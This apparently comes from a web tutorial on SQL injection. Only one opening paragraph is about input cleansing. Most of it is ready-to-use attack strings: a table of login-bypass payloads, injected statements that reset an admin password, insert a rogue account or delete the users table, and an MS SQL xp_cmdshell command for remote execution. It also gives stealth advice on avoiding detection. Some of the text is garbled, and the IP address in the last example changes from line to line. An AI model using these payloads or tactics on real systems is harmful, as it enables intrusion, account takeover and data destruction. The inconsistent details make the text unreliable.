Structured Query Language – SQL Injection
A major attack vector web programmers sometimes forget about is input cleansing. If user inputs are not cleansed prior to submitting the data to the SQL server attackers can submit malicious code to the server. This code can make the server return more data than it should or allow the attacker to delete entire databases.
SQL injection points occur anytime user inputs are not properly cleansed. The most common points of attack are login pages, search pages and URL strings. Attacks are not limited to these points of entry. All user input needs to be correctly cleansed to prevent SQL injection attacks.
SQL Injection Basics
SQL injections a simple in theory in which the attack finds an input that is trusted and passed to the SQL server. When the attacker finds a vulnerable input it is time to force the SQL query to return true no matter what the programmer is trying to do.
The most common way to force a SQL statement to return true is to add OR 1=1– to a vulnerable input.
‘ OR 1=1’
‘ : Closes the string that the vulnerable input is looking for.
OR : a logical expression to start allow for another statement. The OR means that if the first statement fails because of the empty entry the entire statement may evaluate to true if the second statement is true.
1=1 : Since 1 will always equal 1 this expression will evaluate to true.
— : Is a comment which forces SQL to ignore everything after the â€“ (dash dash).
Here are a few variations along the same lines as above:
|admin’– ‘||or 0=0 —|
|” or 0=0 —||or 0=0 —|
|‘ or 0=0 # “||or 0=0 #|
|or 0=0 # ‘||or ‘x’=’x|
|” or “x”=”x ‘)||or (‘x’=’x|
|‘ or 1=1– “||or 1=1–|
|or 1=1– ‘||or a=a–|
|” or “a”=”a ‘)||or (‘a’=’a|
|“) or (“a”=”a hack”||or “a”=”a|
|hack” or 1=1 — hack’||or 1=1 —|
|hack’ or ‘a’=’a hack’)||or (‘a’=’a|
Update Data in Database
The ability to edit data in the database can allow attackers to change admin passwords. This attack can be done in a URL, a search box, a login page or any other unprotected input location. The following code sample shows how a password can be changed if the table name and an account are know.
‘; UPDATE ‘users’ SET ‘password’ = ‘hacked’ WHERE username=’crackable’–
The above code updates the users table where the username is crackable. SET states that the password field for the username crackable will be changed to hacked.
Insert Data into Database
Inserting data into a database is very similar to updating the table. As with the Update this attack can be done in a URL, a search box, a login page or any other unprotected input location. The following example expects that the attacker knows the table and a general structure of the table.
‘; INSERT INTO ‘users’ (‘id’, ‘username’, ‘password’, ‘details’) VALUES (1203, ‘myaccount’, ‘mypassword’, ‘NA’)–
The above code inserts a new user into the users table. A new account is created with an id of 1203, username of myaccount, password of mypassword, and details of NA. Creating new accounts is less likely to be detected than changing the password of an existing account. If enough table information can be gained to insert a new account in the users database, it is preferred over updating an existing account. If table information cannot be obtained the next best thing would be to change a users password with an update.
Deleting Data from a Database
Deleting data from a database is very similar to updating and inserting data in a database table. As with the update and the insert this attack can be done in a URL, a search box, a login page or any other unprotected input location. The following code sample requires the attacker to know the table name.
‘; DELETE FROM ‘users’ —
The above code sample deletes all the data from the users table. In general an attacker would only use this delete command if they wanted to be purely destructive. This command will be discovered very quickly when users are unable to log into the website.
Remote Execution with SQL Injection (MS SQL)
SQL injections can be very powerful. This is an example of a SQL injection attack that can lead to remote execution. The default installation of MS SQL Server runs as local system, which is the same as Administrator. With the follow code stored procedures like master..xp_cmdshell can be executed which would allow and attacker to perform remote executions as if on the box.
‘; exec master..xp_cmdshell ‘ping 184.108.40.206’–
The semi colon in the statement will end the current SQL query and then allow a new SQL command. To verify that the command executed successfully, a packet sniffer can be used to sniff ICMP packets on 220.127.116.11. If packets are received at 18.104.22.168 from the SQL server the stored procedure was executed successfully.